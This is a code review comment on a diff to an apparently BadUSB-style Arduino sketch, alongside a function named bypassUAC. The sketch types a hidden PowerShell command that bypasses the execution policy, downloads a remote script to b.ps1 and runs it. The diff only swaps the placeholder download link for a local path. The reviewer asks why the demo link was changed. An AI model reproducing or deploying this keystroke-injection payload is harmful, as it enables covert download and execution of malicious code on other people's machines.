arduino_source/sketch/sketch.ino

```diff
@@ -36,7 +36,7 @@ void bypassUAC(){
 }
 
 void printCommand(){
-    Keyboard.println("PowerShell.exe -windowstyle hidden Set-ExecutionPolicy Bypass -Force (new-object System.Net.WebClient).DownloadFile('LINK_HERE', 'b.ps1'); Set-ExecutionPolicy Unrestricted; .\\b.ps1");
+    Keyboard.println("PowerShell.exe -windowstyle hidden Set-ExecutionPolicy Bypass -Force (new-object System.Net.WebClient).DownloadFile('python_source/main.py', 'b.ps1'); Set-ExecutionPolicy Unrestricted; .\\b.ps1");
```

Comment:
Here the ps1 file is substituted. Why change if this is a demo and is described in the wiki?